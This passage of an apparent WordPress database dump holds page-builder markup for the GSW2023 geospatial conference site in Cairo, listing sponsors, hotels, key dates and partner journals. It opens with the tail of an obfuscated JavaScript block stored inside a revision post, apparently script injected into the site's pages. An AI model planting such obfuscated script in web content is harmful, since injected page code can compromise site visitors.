_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:56:02','2023-08-13 03:56:02','',3066,'https://gsw2023.com/?p=5100',0,'revision','',0),
(5101,1,'2023-08-13 03:57:16','2023-08-13 03:57:16','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 110px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 110px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> 